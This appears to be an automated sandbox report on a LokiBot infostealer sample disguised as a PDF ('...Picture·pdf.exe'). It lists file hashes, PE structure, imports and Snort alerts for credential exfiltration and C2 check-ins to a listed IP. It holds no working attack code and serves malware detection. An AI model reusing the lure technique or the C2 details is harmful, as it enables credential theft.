SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

C:\Users\user\Desktop\Flyverdragter.lnk

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1444
Entropy (8bit):	3.1163758477915353
Encrypted:	false
SSDEEP:	24:8+LDWLgD4/BV02DeVSjqVU9y+pd8J95wAzDhpdqy:86CgDszheMq6xpo95vzDLUy
MD5:	9C6075AC00D719D999D73A1A2B480792
SHA1:	348B9CF7D5ADF928627913F52235718AF7B33E83
SHA-256:	18C0B87648B49055C980952BE2605A3AA0B1E9563689EFF7DEF275314A264374
SHA-512:	AB2E81C4E645460CC2D59AEC153A548CF59074E796F606CF3A9D526E66F176B67A937B35CAC2BBBEBD11CD4DD840F4302D274FB54AA85CCBB848B278C9A65D30
Malicious:	false
Preview:	L..................F........................................................a....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .`.1...........triorchism..F............................................t.r.i.o.r.c.h.i.s.m.....`.2...........hvidte.pal..F............................................h.v.i.d.t.e...p.a.l.......L.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.6787678250834
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File size:	484'816 bytes
MD5:	33bc360990c66beea144ae48d17504a6
SHA1:	7dfb4c70ef7d73c8618ce8799d414ba3c3fe9684
SHA256:	49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a
SHA512:	a83b83ff3c462d39351553372055e0c16d98c8cfe3083c6958b631861575901cf68925d6a7dadab68f3c78deb59bab7d3d7541946f6e6b69073a5007fd3af1dd
SSDEEP:	12288:TKYi/Le1bRNn/XoeBKk3nM40FC8/1YnrfY2:OFDe111/XlBLv0FCOcrfY2
TLSH:	BEA402C727C651CAF87942F104235216A7B3FA6B95415E4FFE2C76FB2875302805BA2B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	3f775d2d1c1e5963

Static PE Info

General

Entrypoint:	0x4030d9
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=slicer@Unqueme.Uni, O=Seksdoble, OU="joisting Homochromous Aflededes ", CN=Seksdoble, L=Armix, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	13/11/2023 04:51:30 12/11/2026 04:51:30
Subject Chain	E=slicer@Unqueme.Uni, O=Seksdoble, OU="joisting Homochromous Aflededes ", CN=Seksdoble, L=Armix, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Version:	3
Thumbprint MD5:	3DDC89B649BDA2CE0682A755B59B933E
Thumbprint SHA-1:	88ED6394CD91CCEA49582AA0A4D586AF7F7417B7
Thumbprint SHA-256:	E8706B3464F85FC2817446552064C5844FF1202B1C71044CA03919CF662D6E5E
Serial:	271959D19728A6E471825057D3277B2F08D2685D

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F92E4CA4B83h
push ebx
call 00007F92E4CA7AF1h
cmp eax, ebx
je 00007F92E4CA4B79h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F92E4CA7A6Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F92E4CA4B5Dh
push ebp
push 00000009h
call 00007F92E4CA7AC4h
push 00000007h
call 00007F92E4CA7ABDh
mov dword ptr [00423704h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407174h]
push 00409188h
push 00422F00h
call 00007F92E4CA76E7h
call dword ptr [0040709Ch]
mov ebp, 00429000h
push eax
push ebp
call 00007F92E4CA76D5h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0x15800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x74d50	0x1880
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c5b	0x5e00	905b5e59c06f35acf133c0788daacce5	False	0.6603640292553191	data	6.411456379497882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	43fab6a80651bd97af8f34ecf44cd8ac	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	00798d060e552892531c88ed1710ae2c	False	0.6376953125	data	5.108396988130901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0x15800	0x15800	fd0be0fc5cfb383174172a3f4e7ed15d	False	0.36346293604651164	data	5.001547188153925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x342c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.32665917425766
RT_ICON	0x44af0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4768672199170125
RT_ICON	0x47098	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5201688555347092
RT_ICON	0x48140	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6012295081967213
RT_ICON	0x48ac8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.651595744680851
RT_DIALOG	0x48f30	0x100	data	English	United States	0.5234375
RT_DIALOG	0x49030	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x49150	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x49218	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x49278	0x4c	data	English	United States	0.8157894736842105
RT_VERSION	0x492c8	0x1f4	data	English	United States	0.55
RT_MANIFEST	0x494c0	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/04/24-08:22:51.476463	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.4	45.61.136.239
07/04/24-08:23:09.594874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.4	45.61.136.239
07/04/24-08:22:58.321813	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.4	45.61.136.239
07/04/24-08:22:58.321813	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.4	45.61.136.239
07/04/24-08:22:51.476463	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.4	45.61.136.239
07/04/24-08:23:19.733205	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.4	45.61.136.239
07/04/24-08:23:29.621058	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.4	45.61.136.239
07/04/24-08:23:39.706240	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.4	45.61.136.239
07/04/24-08:23:03.170213	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.4	45.61.136.239
07/04/24-08:23:09.594874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.4	45.61.136.239
07/04/24-08:23:29.621058	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.4	45.61.136.239
07/04/24-08:23:59.644126	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.4	45.61.136.239
07/04/24-08:23:55.668996	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.4	45.61.136.239
07/04/24-08:23:13.686997	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.4	45.61.136.239
07/04/24-08:23:42.854659	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.4	45.61.136.239
07/04/24-08:23:19.733205	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.4	45.61.136.239
07/04/24-08:23:26.698638	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.4	45.61.136.239
07/04/24-08:23:36.450860	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.4	45.61.136.239
07/04/24-08:23:42.854659	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.4	45.61.136.239
07/04/24-08:23:06.423937	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.4	45.61.136.239
07/04/24-08:23:42.854659	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.4	45.61.136.239
07/04/24-08:24:04.224134	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.4	45.61.136.239
07/04/24-08:24:04.224134	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.4	45.61.136.239
07/04/24-08:23:45.825819	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.4	45.61.136.239
07/04/24-08:23:52.576198	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.4	45.61.136.239
07/04/24-08:22:46.615235	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.4	45.61.136.239
07/04/24-08:22:46.615235	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49740	80	192.168.2.4	45.61.136.239
07/04/24-08:23:33.104567	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.4	45.61.136.239
07/04/24-08:23:59.644126	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.4	45.61.136.239
07/04/24-08:22:54.945889	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.4	45.61.136.239
07/04/24-08:23:39.706240	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.4	45.61.136.239
07/04/24-08:23:03.170213	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.4	45.61.136.239
07/04/24-08:23:03.170213	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.4	45.61.136.239
07/04/24-08:23:09.594874	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.4	45.61.136.239
07/04/24-08:23:22.867673	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.4	45.61.136.239
07/04/24-08:23:22.867673	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.4	45.61.136.239
07/04/24-08:23:49.262816	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.4	45.61.136.239
07/04/24-08:23:59.644126	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.4	45.61.136.239
07/04/24-08:23:55.668996	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.4	45.61.136.239
07/04/24-08:23:29.621058	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.4	45.61.136.239
07/04/24-08:22:58.321813	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.4	45.61.136.239
07/04/24-08:23:19.733205	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.4	45.61.136.239
07/04/24-08:22:51.476463	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.4	45.61.136.239
07/04/24-08:23:16.685865	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.4	45.61.136.239
07/04/24-08:23:06.423937	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.4	45.61.136.239
07/04/24-08:23:06.423937	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.4	45.61.136.239
07/04/24-08:23:45.825819	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.4	45.61.136.239
07/04/24-08:23:26.698638	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.4	45.61.136.239
07/04/24-08:23:26.698638	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.4	45.61.136.239
07/04/24-08:23:55.668996	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.4	45.61.136.239
07/04/24-08:23:45.825819	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.4	45.61.136.239
07/04/24-08:23:16.685865	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.4	45.61.136.239
07/04/24-08:23:36.450860	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.4	45.61.136.239
07/04/24-08:23:36.450860	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.4	45.61.136.239
07/04/24-08:22:46.615235	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.4	45.61.136.239
07/04/24-08:23:33.104567	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.4	45.61.136.239
07/04/24-08:23:16.685865	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.4	45.61.136.239
07/04/24-08:23:33.104567	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.4	45.61.136.239
07/04/24-08:23:13.686997	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.4	45.61.136.239
07/04/24-08:23:13.686997	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.4	45.61.136.239
07/04/24-08:24:04.224134	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.4	45.61.136.239
07/04/24-08:23:22.867673	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.4	45.61.136.239
07/04/24-08:22:54.945889	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.4	45.61.136.239
07/04/24-08:22:54.945889	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.4	45.61.136.239
07/04/24-08:23:52.576198	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.4	45.61.136.239
07/04/24-08:23:49.262816	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.4	45.61.136.239
07/04/24-08:23:49.262816	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.4	45.61.136.239
07/04/24-08:23:52.576198	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.4	45.61.136.239
07/04/24-08:23:39.706240	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.4	45.61.136.239

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2024 08:22:41.871143103 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:41.871196032 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:41.871263027 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:41.882508039 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:41.882538080 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.534770012 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.534948111 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.535511017 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.535576105 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.654560089 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.654594898 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.654963970 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.655024052 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.659256935 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.704509974 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.958231926 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.959261894 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:42.959414005 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.969172955 CEST	49738	443	192.168.2.4	216.58.212.142
Jul 4, 2024 08:22:42.969192982 CEST	443	49738	216.58.212.142	192.168.2.4
Jul 4, 2024 08:22:43.102200031 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.102236986 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:43.102312088 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.102579117 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.102591038 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:43.770874977 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:43.770975113 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.834207058 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.834239960 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:43.834496021 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:43.834558964 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.834979057 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:43.880498886 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.474313974 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.474528074 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.480125904 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.480200052 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.493406057 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.493479013 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.493480921 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.493490934 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.493521929 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.493537903 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.500623941 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.500678062 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.568254948 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.568361998 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.568404913 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.568427086 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.568454981 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.568473101 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.568473101 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.568489075 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.568511963 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.568547964 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.569870949 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.569933891 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.569947958 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.569993973 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.575803041 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.575871944 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.575894117 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.575941086 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.581918001 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.581975937 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.581998110 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.582045078 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.588001013 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.588067055 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.588089943 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.588133097 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.593899965 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.593965054 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.593988895 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.594037056 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.600007057 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.600059986 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.600068092 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.600111961 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.605492115 CEST	443	49739	142.250.185.97	192.168.2.4
